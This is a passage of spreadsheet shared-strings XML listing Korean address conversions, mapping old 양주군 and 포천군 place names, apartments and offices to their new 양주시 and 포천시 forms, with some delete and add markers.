    <t>양주군 백석읍 오산리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 백석읍 오산리</t>
    </r>
  </si>
  <si>
    <t>양주군 백석읍 흥죽리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 백석읍 흥죽리</t>
    </r>
  </si>
  <si>
    <t>양주군 백석읍</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">양주시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>백석읍</t>
    </r>
  </si>
  <si>
    <t>양주군 광적면을</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 광적면으로</t>
    </r>
  </si>
  <si>
    <t>양주군 광적면 가납1리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 광적면 가납1리</t>
    </r>
  </si>
  <si>
    <t>양주군 광적면 가납2리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 광적면 가납2리</t>
    </r>
  </si>
  <si>
    <t>양주군 광적면 가납3리</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">양주시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>광적면 가납3리</t>
    </r>
  </si>
  <si>
    <t>양주군 광적면 광석리</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">양주시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>광적면 광석리</t>
    </r>
  </si>
  <si>
    <t>양주군 광적면 덕도1,2리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 광적면 덕도1,2리</t>
    </r>
  </si>
  <si>
    <t>양주군 광적면 덕도3리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 광적면 덕도3리</t>
    </r>
  </si>
  <si>
    <t>양주군 광적면 비암리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 광적면 비암리</t>
    </r>
  </si>
  <si>
    <t>양주군 광적면 석우리</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">양주시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>광적면 석우리</t>
    </r>
  </si>
  <si>
    <t>양주군 광적면 우고리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 광적면 우고리</t>
    </r>
  </si>
  <si>
    <t>양주군 광적면 효촌리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 광적면 효촌리</t>
    </r>
  </si>
  <si>
    <t>양주군 광적면</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 광적면</t>
    </r>
  </si>
  <si>
    <t>양주군 남면을</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 남면으로</t>
    </r>
  </si>
  <si>
    <t>양주군 남면 경신리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 남면 경신리</t>
    </r>
  </si>
  <si>
    <t>양주군 남면 구암리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 남면 구암리</t>
    </r>
  </si>
  <si>
    <t>양주군 남면 두곡리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 남면 두곡리</t>
    </r>
  </si>
  <si>
    <t>양주군 남면 매곡리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 남면 매곡리</t>
    </r>
  </si>
  <si>
    <t>양주군 남면 상수리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 남면 상수리</t>
    </r>
  </si>
  <si>
    <t>양주군 남면 신산리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 남면 신산리</t>
    </r>
  </si>
  <si>
    <t>양주군 남면 신암리</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">양주시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>남면 신암리</t>
    </r>
  </si>
  <si>
    <t>양주군 남면 입암리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 남면 입암리</t>
    </r>
  </si>
  <si>
    <t>양주군 남면 한산리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 남면 한산리</t>
    </r>
  </si>
  <si>
    <t>양주군 남면 황방리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 남면 황방리</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">양주군 남면 </t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 남면 </t>
    </r>
  </si>
  <si>
    <t>양주군 은현면을</t>
  </si>
  <si>
    <r>
      <t>양주군</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 은현면으로</t>
    </r>
  </si>
  <si>
    <t>양주군 은현면 도하리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 은현면 도하리</t>
    </r>
  </si>
  <si>
    <t>양주군 은현면 봉암리</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">양주시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>은현면 봉암리</t>
    </r>
  </si>
  <si>
    <t>양주군 은현면 선암1리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 은현면 선암1리</t>
    </r>
  </si>
  <si>
    <t>양주군 은현면 선암2리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 은현면 선암2리</t>
    </r>
  </si>
  <si>
    <t>양주군 은현면 용암리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 은현면 용암리</t>
    </r>
  </si>
  <si>
    <t>양주군 은현면 운암리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 은현면 운암리</t>
    </r>
  </si>
  <si>
    <t>양주군 은현면 하패리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 은현면 하패리</t>
    </r>
  </si>
  <si>
    <t>양주군 은현면</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">양주시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>은현면</t>
    </r>
  </si>
  <si>
    <t>양주군 장흥면을</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 장흥면으로</t>
    </r>
  </si>
  <si>
    <t>양주군 장흥면 교현리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 장흥면 교현리</t>
    </r>
  </si>
  <si>
    <t>양주군 장흥면 부곡리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 장흥면 부곡리</t>
    </r>
  </si>
  <si>
    <t>양주군 장흥면 삼상리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 장흥면 삼상리</t>
    </r>
  </si>
  <si>
    <t>양주군 장흥면 삼하리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 장흥면 삼하리</t>
    </r>
  </si>
  <si>
    <t>양주군 장흥면 석현리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 장흥면 석현리</t>
    </r>
  </si>
  <si>
    <t>양주군 장흥면 울대리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 장흥면 울대리</t>
    </r>
  </si>
  <si>
    <t>양주군 장흥면 일영1리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 장흥면 일영1리</t>
    </r>
  </si>
  <si>
    <t>양주군 장흥면 일영2리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 장흥면 일영2리</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">양주군 장흥면 </t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 장흥면 </t>
    </r>
  </si>
  <si>
    <t>포천군 포천읍 동교리</t>
  </si>
  <si>
    <t>포천시 동교동</t>
  </si>
  <si>
    <t>포천군 포천읍 선단리</t>
  </si>
  <si>
    <t>포천시 선단동</t>
  </si>
  <si>
    <t>포천군 포천읍 대진대학교</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">포천시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>선단동</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 대진대학교</t>
    </r>
  </si>
  <si>
    <t>포천군 포천읍 설운리</t>
  </si>
  <si>
    <t>포천시 설운동</t>
  </si>
  <si>
    <t>포천군 포천읍 골든아파트</t>
  </si>
  <si>
    <r>
      <t>포천시 신읍동</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 골든아파트</t>
    </r>
  </si>
  <si>
    <t>포천군 포천읍  농협중앙회포천군지부</t>
  </si>
  <si>
    <t>포천시 신읍동 농협중앙회포천시지부</t>
  </si>
  <si>
    <t>포천군 포천읍 유한아파트</t>
  </si>
  <si>
    <r>
      <t>포천시 신읍동</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 유한아파트</t>
    </r>
  </si>
  <si>
    <t>포천군 포천읍 일신아파트</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">포천시 신읍동 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>일신아파트</t>
    </r>
  </si>
  <si>
    <t>포천군 포천읍 포천군청</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">포천시 신읍동 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>포천시청</t>
    </r>
  </si>
  <si>
    <t>포천군 포천읍 포천등기소</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">포천시 신읍동 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>포천등기소</t>
    </r>
  </si>
  <si>
    <t>포천군 포천읍 포천우체국</t>
  </si>
  <si>
    <r>
      <t>포천시 신읍동</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 포천우체국</t>
    </r>
  </si>
  <si>
    <t>포천군 포천읍 한국아파트</t>
  </si>
  <si>
    <r>
      <t>포천시 신읍동</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 한국아파트</t>
    </r>
  </si>
  <si>
    <t>포천군 포천읍 한신아파트</t>
  </si>
  <si>
    <r>
      <t>포천시 신읍동</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 한신아파트</t>
    </r>
  </si>
  <si>
    <t>포천군 포천읍 현대아파트</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">포천시 신읍동 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>현대아파트</t>
    </r>
  </si>
  <si>
    <t>포천군 포천읍 신읍1리</t>
  </si>
  <si>
    <t>삭제</t>
  </si>
  <si>
    <t>포천시 신읍동 1-22번지</t>
  </si>
  <si>
    <t>추가</t>
  </si>
  <si>
    <t>포천시 신읍동 23-64번지</t>
  </si>
  <si>
    <t>포천시 신읍동 65-118번지</t>
  </si>
  <si>
    <t>포천시 신읍동 119-143번지</t>
  </si>
  <si>
    <t>포천시 신읍동 144-260번지</t>
  </si>
  <si>
    <t>포천시 신읍동 261-700번지</t>
  </si>
  <si>
    <t>포천군 포천읍 신읍리</t>
  </si>
  <si>
    <t>포천시 신읍동</t>
  </si>
  <si>
    <t>포천군 포천읍 어룡리</t>
  </si>
  <si>
    <t>포천시 어룡동</t>
  </si>
  <si>
    <t>포천군 포천읍 자작리</t>
  </si>
  <si>
    <t>포천시 자작동</t>
  </si>
  <si>
    <t>포천군 포천읍</t>
  </si>
  <si>
    <t>포천군 소흘읍을</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 소흘읍으로</t>
    </r>
  </si>
  <si>
    <t>포천군 소흘읍 금용아파트</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">포천시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>소흘읍 금용아파트</t>
    </r>
  </si>
  <si>
    <t>포천군 소흘읍 상운아파트</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 소흘읍 상운아파트</t>
    </r>
  </si>
  <si>
    <t>포천군 소흘읍 우정아파트</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 소흘읍 우정아파트</t>
    </r>
  </si>
  <si>
    <t>포천군 소흘읍 원일아파트</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 소흘읍 원일아파트</t>
    </r>
  </si>
  <si>
    <t>포천군 소흘읍 일신아파트</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">포천시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>소흘읍 일신아파트</t>
    </r>
  </si>
  <si>
    <t>포천군 소흘읍 한국개나리아파트</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 소흘읍 한국개나리아파트</t>
    </r>
  </si>
  <si>
    <t>포천군 소흘읍 고모리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 소흘읍 고모리</t>
    </r>
  </si>
  <si>
    <t>포천군 소흘읍 무림리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 소흘읍 무림리</t>
    </r>
  </si>
  <si>
    <t>포천군 소흘읍 무봉리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 소흘읍 무봉리</t>
    </r>
  </si>
  <si>
    <t>포천군 소흘읍 송우1∼4리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 소흘읍 송우1∼4리</t>
    </r>
  </si>
  <si>
    <t>포천군 소흘읍 송우5∼7리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 소흘읍 송우5∼7리</t>
    </r>
  </si>
  <si>
    <t>포천군 소흘읍 이곡리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 소흘읍 이곡리</t>
    </r>
  </si>
  <si>
    <t>포천군 소흘읍 이가팔리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 소흘읍 이가팔리</t>
    </r>
  </si>
  <si>
    <t>포천군 소흘읍 이동교리</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">포천시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>소흘읍 이동교리</t>
    </r>
  </si>
  <si>
    <t>포천군 소흘읍 직동리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 소흘읍 직동리</t>
    </r>
  </si>
  <si>
    <t>포천군 소흘읍 초가팔리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 소흘읍 초가팔리</t>
    </r>
  </si>
  <si>
    <t>포천군 소흘읍</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 소흘읍</t>
    </r>
  </si>
  <si>
    <t>포천군 가산면을</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 가산면으로</t>
    </r>
  </si>
  <si>
    <t>포천군 가산면 가산리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 가산면 가산리</t>
    </r>
  </si>
  <si>
    <t>포천군 가산면 감암리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 가산면 감암리</t>
    </r>
  </si>
  <si>
    <t>포천군 가산면 금현리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 가산면 금현리</t>
    </r>
  </si>
  <si>
    <t>포천군 가산면 마산리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 가산면 마산리</t>
    </r>
  </si>
  <si>
    <t>포천군 가산면 마전리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 가산면 마전리</t>
    </r>
  </si>
  <si>
    <t>포천군 가산면 방축리</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">포천시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>가산면 방축리</t>
    </r>
  </si>
  <si>
    <t>포천군 가산면 우금리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 가산면 우금리</t>
    </r>
  </si>
  <si>
    <t>포천군 가산면 정교리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 가산면 정교리</t>
    </r>
  </si>
  <si>
    <t>포천군 가산면</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 가산면</t>
    </r>
  </si>
  <si>
    <t>포천군 관인면을</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">포천시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>관인면으로</t>
    </r>
  </si>
  <si>
    <t>포천군 관인면 냉정면</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 관인면 냉정면</t>
    </r>
  </si>
  <si>
    <t>포천군 관인면 사정리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 관인면 사정리</t>
    </r>
  </si>
  <si>
    <t>포천군 관인면 삼율리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 관인면 삼율리</t>
    </r>
  </si>
  <si>
    <t>포천군 관인면 중리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 관인면 중리</t>
    </r>
  </si>
  <si>
    <t>포천군 관인면 초과리</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">포천시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>관인면 초과리</t>
    </r>
  </si>
  <si>
    <t>포천군 관인면 탄동리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 관인면 탄동리</t>
    </r>
  </si>
  <si>
    <t>포천군 관인면</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 관인면</t>
    </r>
  </si>
  <si>
    <t>포천군 군내면을</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 군내면</t>
    </r>
  </si>
  <si>
    <t>포천군 군내면 포천경찰서</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 군내면 포천경찰서</t>
    </r>
  </si>
  <si>
    <t>포천군 군내면 구읍리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 군내면 구읍리</t>
    </r>
  </si>
  <si>
    <t>포천군 군내면 명산리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 군내면 명산리</t>
    </r>
  </si>
  <si>
    <t>포천군 군내면 상성북리</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">포천시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>군내면 상성북리</t>
    </r>
  </si>
  <si>
    <t>포천군 군내면 용정리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
